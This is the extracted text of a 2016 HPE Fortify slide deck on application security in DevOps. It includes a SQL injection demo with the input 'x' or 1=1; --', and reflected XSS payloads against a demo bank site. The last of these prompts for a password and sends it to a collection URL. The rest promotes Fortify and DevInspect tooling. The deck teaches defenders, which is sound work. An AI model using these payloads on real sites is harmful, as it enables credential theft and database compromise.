DiscoverBest of Show 2016

2. - 3. März 2016, Düsseldorf

Softwaresicherheit im Zeitalter von DevOps

Lucas von StockhausenRegional Product Manager Fortify

2. - 3. März 2016

The case for Application SecurityI am secure – I have a firewall

3

Malware over the years

4

HPE Security ResearchCyber Risk Report 2016

There is a breach in the headlines almost every day

5http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Aircraft Accidents over the years

6

0

20

40

60

80

100

120

140

0

500

1000

1500

2000

2500

3000

Accid

ents

Casualtie

s

Year

Aircraft Accidents

Casualties Accidents

Number of accidents and fatalities per year (excluding sabotage, shoot-downs)

https://aviation-safety.net/statistics/period/

The increase in attacks is constant

7

Ponemon Cost of Cyber Crime Study 2015Ponemon Cost of Cyber Crime Study 2012

1 2 3 4 5 6 7 8

Existing network and perimeter based security is insufficient

84% of breaches exploit vulnerabilities in the application layer

Yet the ratio of spending between perimeter security and application security is 23-to-1- Gartner Maverick Research: Stop Protecting Your Apps; It’s Time for Apps to Protect Themselves (2014)

Basic hacking example

9

Live example

– SQL – Injection

– Telnet

– Cross site scripting

10

SQL-Injection

String userName = ctx.getAuthenticatedUserName();

String itemName = request.getParameter("itemName");

String query = "SELECT * FROM items WHERE owner = '"

+ userName + "' AND itemname = '" + itemName + "'";

ResultSet rs = stmt.execute(query);

username = lucas

itemname = "x' or 1=1; --

String userName = ctx.getAuthenticatedUserName();

String itemName = request.getParameter("itemName");

String query = "SELECT * FROM items WHERE owner = '"

+ lucas+ "' AND itemname = '" + "x' or 1=1; -- + "'";

ResultSet rs = stmt.execute(query);

SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '"

SQL-Injection

12

Telnet session

13

XSS – Cross Site Scripting

14

Real word payloads

15

Real-world payloads

– So, what is XSS truly capable off – What can you execute?

Real-world payloads

– Simple answer:

– JavaScript

Real-world payloads

– Simple answer:

– JavaScript

– Wait. That weak-sauce web scripting language that you had to learn in college back in the day?

– How bad could it be?

Real-world payloads

– Javascript is a full-featured programming language

– Object-oriented

– C-like syntax

– Extremely powerful

– Native in every browser

Real-world payloads

– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential

Real-world payloads

– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential

– Let’s take a look at a possible attack and how to build it up

– Let´s go to http://legacy.webapsecurity.com

Real-world payloads

– http://legacy.webapsecurity.com

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter yourusername',' '); password=prompt('Please enter your password',' '); alert("username="%2B%0Ausername%2B%0A" and password="%2B%0Apassword);</script>

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter yourusername',' '); password=prompt('Please enter your password',' '); document.write('<imgsrc="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>Invalid Login: '%2B%0Ausername);</script>

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter yourusername',' '); password=prompt('Please enter your password',' '); document.write('<imgsrc="http://localhost:8080/splc/listMyItems.do?username='%2Busername%2B'%26password='%2Bpassword%2B'">'); document.write('<br>Invalid Login: '%2Busername);</script>

Real-world payloads

– There are many other possibilities and Opportunities

– Remember, if these are the easy options, imagine what others are capable of!

Real-world payloads

– There are a number of ways to launch the actual attack

– Stored XSS

– Reflected XSS

– Owning a page that a victim visits

– Remember, navigating to a page is permission to run what’s on that page

– Consider visiting a webpage is an act of significant trust

What is the reason

29

We convince &

pay the developer

to fix it

4

We are breached or

pay someone to tell

us our code is

insecure

3

Today’s approach > expensive, reactive

IT deploys the

insecure

software

2

Somebody builds

insecure software

1

30X

15X

10X

5X

2X

Why it doesn’t work30x more costly to secure in production

–After an application is released into Production, it costs 30x more than during design.

Co

st

Source: NIST

ProductionSystem

testing

Integration/

component testing

CodingRequirements

Embed security into SDLC

development process 1

This is application security

The right approach > systematic, proactive

In-house Outsourced Commercial Open source

Leverage Security Gate to

validate resiliency of internal or

external code before Production

2

Monitor and protect software

running in Production

3Improve SDLC policies

The help

Static Application Security Testing (SAST) Dynamic Application Security Testing (DAST)

Interactive Application Security Testing (IAST) Runtime Application Self Protection (RASP)

SecurityDevelopment Teams

Build Tool

Example Process for Analysis

Fortify SSC Server

CISO

AWB

Project Security

Lead

Security Auditor

AWB

Development

Manager

IDE

Developer

Fortify SCA

AWB

Fortify CM

AWB

WebInspect

Source Code Repository(s)

Central Build Server(s)

2. Audit

3. Assign

4. Fix

Monitor

6. Report

1. Identify

Defect Tracking System CM

CM

5. Validate

Movement to DevOps

35

• Business leaders have “Agility” at the top of their priorities as they prepare for the fast-paced, very competitive future.

• Processes need to be further streamlined, minimize resource consumption and reduce time-to-market. Security context

• Development organizations can save time and money by building in security early in the development process

Challenges in a DevOps environment

36

• Developers are not security experts

• Security testing is an afterthought

• Pressure to push out software into production leaves no time for security

• Security assessment take up resources

Introducing HPE Security DevInspect

37

Bringing application security closer to the Developer

•AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the native developers environment.

•Brings market-leading AppSec technologies directly to the developer, ensuring secure code as your “shift left” in your dev process.

•Real-time, instant security results as the developer is writing code.

•Enable developers to assess for security weaknesses.

End to End Application Security

38

On-premise

On-demand Fortify on Demand App Defender

Static Dynamic Runtime

Application Development

App Defender

DevInspect

HPE Security DevInspect:

39

•Static Code Analysis

•Real-time lightweight analysis of the source code

•Dynamic Analysis

•Runtime Analysis

•Documentation

What’s included in DevInspect 1.0?

40

•Static Code Analysis

•Real-time lightweight analysis of the source code

• Integration for Fortify Software Security Center (SSC)

• Integration for Fortify on Demand (FoD)

•Documentation

Key Benefits

41

DESIGNED FOR THE DEVELOPER

• Fully integrated into the native development environment (IDE)

• Supports the DevOps toolchain

• Providing thorough and robust software security analysis of an application

INSTANT RESULTS (Fast)

• Inline analysis of the source code as the developer types providing immediate feedback

• Out of the box results – no configuration required

CONTINUOUS FEEDBACK

• Continuously updated security findings as code is written

• Tracks findings and guided developers toward remediation

SecurityDevelopment Teams

Build Tool

Example Process for Static Analysis in DevOps

Fortify SSC Server

CISO

AWB

Project Security

Lead

Security Auditor

AWB

Development

Manager

IDE

Developer

Fortify SCA

AWB

Fortify CM

AWB

WebInspect

Source Code Repository(s)

Central Build Server(s)

3. Milestone Scan

Monitor

5. Report2. Checkin

Defect Tracking System CM

CM

4. Validate

1. DevInspect

Security AssistantReal-time lightweight analysis of the source code

43

All issues detected in the project

Fortify Icon added to iconbar

Vulnerable line of code highlighted& Tool tip for additional information

Detailed remediation advice

Fortify menu for additional options

Thank youlvonstockhausen@hpe.com

44